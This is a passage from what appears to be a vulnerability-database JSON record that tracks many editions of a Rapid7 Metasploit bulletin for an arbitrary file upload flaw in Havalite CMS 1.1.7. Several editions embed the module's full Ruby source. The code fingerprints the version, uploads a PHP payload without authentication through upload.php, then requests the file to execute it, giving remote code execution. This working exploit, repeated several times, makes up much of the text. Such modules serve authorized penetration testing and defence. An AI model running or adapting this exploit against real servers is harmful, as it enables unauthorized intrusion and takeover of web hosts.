'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T20:34:30", "differentElements": ["sourceData"], "edition": 73}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-03T03:23:20", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1462-1", "OPENSUSE-SU-2019:1468-1", "OPENSUSE-SU-2019:1459-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2019:1456-1", "OPENSUSE-SU-2019:1450-1", "OPENSUSE-SU-2019:1453-1", "OPENSUSE-SU-2019:1444-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1808-1:103F5", "DEBIAN:DLA-1807-1:21182", "DEBIAN:DLA-1806-1:86268"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808"]}, {"type": "ubuntu", "idList": ["USN-3995-2", "USN-3995-1", "USN-3994-1", "USN-3976-4"]}, {"type": "redhat", "idList": ["RHSA-2019:1279", "RHSA-2019:1278"]}], "modified": "2019-05-28T20:34:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-03T03:23:20", "differentElements": ["sourceData"], "edition": 74}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-03T05:26:48", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1462-1", "OPENSUSE-SU-2019:1468-1", "OPENSUSE-SU-2019:1459-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2019:1456-1", "OPENSUSE-SU-2019:1450-1", "OPENSUSE-SU-2019:1453-1", "OPENSUSE-SU-2019:1444-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1808-1:103F5", "DEBIAN:DLA-1807-1:21182", "DEBIAN:DLA-1806-1:86268"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808"]}, {"type": "ubuntu", "idList": ["USN-3995-2", "USN-3995-1", "USN-3994-1", "USN-3976-4"]}, {"type": "redhat", "idList": ["RHSA-2019:1279", "RHSA-2019:1278"]}], "modified": "2019-05-28T20:34:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-03T05:26:48", "differentElements": ["sourceData"], "edition": 75}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-11T00:31:39", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1462-1", "OPENSUSE-SU-2019:1468-1", "OPENSUSE-SU-2019:1459-1", "OPENSUSE-SU-2019:1455-1", "OPENSUSE-SU-2019:1456-1", "OPENSUSE-SU-2019:1450-1", "OPENSUSE-SU-2019:1453-1", "OPENSUSE-SU-2019:1444-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1808-1:103F5", "DEBIAN:DLA-1807-1:21182", "DEBIAN:DLA-1806-1:86268"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808"]}, {"type": "ubuntu", "idList": ["USN-3995-2", "USN-3995-1", "USN-3994-1", "USN-3976-4"]}, {"type": "redhat", "idList": ["RHSA-2019:1279", "RHSA-2019:1278"]}], "modified": "2019-05-28T20:34:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-11T00:31:39", "differentElements": ["sourceData"], "edition": 76}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-11T02:33:24", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 1.8, "vector": "NONE", "modified": "2019-06-11T02:33:24"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DSA-4461-1:C87EB", "DEBIAN:DSA-4460-1:50632", "DEBIAN:DSA-4459-1:0EE56", "DEBIAN:DLA-1816-1:F3BD7", "DEBIAN:DLA-1817-1:6174B"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "redhat", "idList": ["RHSA-2019:1456", "RHSA-2019:1455", "RHSA-2019:1436", "RHSA-2019:1429", "RHSA-2019:1424", "RHSA-2019:1423", "RHSA-2019:1422"]}, {"type": "threatpost", "idList": ["THREATPOST:BAD51469E5397055C24BA057979CD8C8"]}, {"type": "freebsd", "idList": ["AB099D2C-8C8C-11E9-8BA7-6451062F0F7A"]}, {"type": "ubuntu", "idList": ["USN-4014-2", "USN-4015-1", "USN-4016-1", "USN-4016-2"]}, {"type": "exploitdb", "idList": ["EDB-ID:46984"]}], "modified": "2019-06-11T02:33:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-11T02:33:24", "differentElements": ["sourceData"], "edition": 77}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-13T04:32:12", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 4.7, "vector": "NONE", "modified": "2019-06-13T04:32:12"}, "dependencies": {"references": [{"type": "ubuntu", "idList": ["USN-4015-2", "USN-4014-2", "USN-4015-1", "USN-4016-1", "USN-4016-2"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4461-1:C87EB", "DEBIAN:DSA-4460-1:50632", "DEBIAN:DSA-4459-1:0EE56", "DEBIAN:DLA-1816-1:F3BD7", "DEBIAN:DLA-1817-1:6174B"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "redhat", "idList": ["RHSA-2019:1456", "RHSA-2019:1455", "RHSA-2019:1436", "RHSA-2019:1429"]}, {"type": "threatpost", "idList": ["THREATPOST:BAD51469E5397055C24BA057979CD8C8"]}, {"type": "freebsd", "idList": ["AB099D2C-8C8C-11E9-8BA7-6451062F0F7A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32861"]}, {"type": "exploitdb", "idList": ["EDB-ID:46984"]}, {"type": "centos", "idList": ["CESA-2019:1310"]}], "modified": "2019-06-13T04:32:12"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-13T04:32:12", "differentElements": ["sourceData"], "edition": 78}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-13T06:27:45", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 2.0, "vector": "NONE", "modified": "2019-06-13T06:27:45"}, "dependencies": {"references": [{"type": "ubuntu", "idList": ["USN-4015-2", "USN-4014-2", "USN-4015-1", "USN-4016-2", "USN-4016-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4461-1:C87EB", "DEBIAN:DSA-4460-1:50632", "DEBIAN:DSA-4459-1:0EE56", "DEBIAN:DLA-1816-1:F3BD7", "DEBIAN:DLA-1817-1:6174B"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "redhat", "idList": ["RHSA-2019:1456", "RHSA-2019:1455", "RHSA-2019:1436", "RHSA-2019:1429"]}, {"type": "threatpost", "idList": ["THREATPOST:BAD51469E5397055C24BA057979CD8C8"]}, {"type": "freebsd", "idList": ["AB099D2C-8C8C-11E9-8BA7-6451062F0F7A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32861"]}, {"type": "exploitdb", "idList": ["EDB-ID:46984"]}, {"type": "centos", "idList": ["CESA-2019:1310"]}], "modified": "2019-06-13T06:27:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-13T06:27:45", "differentElements": ["sourceData"], "edition": 79}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-20T22:31:16", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 2.0, "vector": "NONE", "modified": "2019-06-13T06:27:45"}, "dependencies": {"references": [{"type": "ubuntu", "idList": ["USN-4015-2", "USN-4014-2", "USN-4015-1", "USN-4016-2", "USN-4016-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4461-1:C87EB", "DEBIAN:DSA-4460-1:50632", "DEBIAN:DSA-4459-1:0EE56", "DEBIAN:DLA-1816-1:F3BD7", "DEBIAN:DLA-1817-1:6174B"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "redhat", "idList": ["RHSA-2019:1456", "RHSA-2019:1455", "RHSA-2019:1436", "RHSA-2019:1429"]}, {"type": "threatpost", "idList": ["THREATPOST:BAD51469E5397055C24BA057979CD8C8"]}, {"type": "freebsd", "idList": ["AB099D2C-8C8C-11E9-8BA7-6451062F0F7A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32861"]}, {"type": "exploitdb", "idList": ["EDB-ID:46984"]}, {"type": "centos", "idList": ["CESA-2019:1310"]}], "modified": "2019-06-13T06:27:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-20T22:31:16", "differentElements": ["sourceData"], "edition": 80}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-21T02:28:24", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 1.9, "vector": "NONE", "modified": "2019-06-21T02:28:24"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DLA-1831-1:3FBA4", "DEBIAN:DSA-4468-1:3B1FA", "DEBIAN:DLA-1789-2:82C69", "DEBIAN:DLA-1830-1:B6D9B", "DEBIAN:DLA-1828-1:261F9", "DEBIAN:DLA-1829-1:1DF99", "DEBIAN:DSA-4447-2:8C972"]}, {"type": "ubuntu", "idList": ["USN-4030-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-1579"]}, {"type": "redhat", "idList": ["RHSA-2019:1587", "RHSA-2019:1580", "RHSA-2019:1579", "RHSA-2019:1578", "RHSA-2019:1571", "RHSA-2019:1569", "RHSA-2019:1553"]}, {"type": "centos", "idList": ["CESA-2019:1579", "CESA-2019:1578", "CESA-2019:1467"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1590-1"]}], "modified": "2019-06-21T02:28:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, 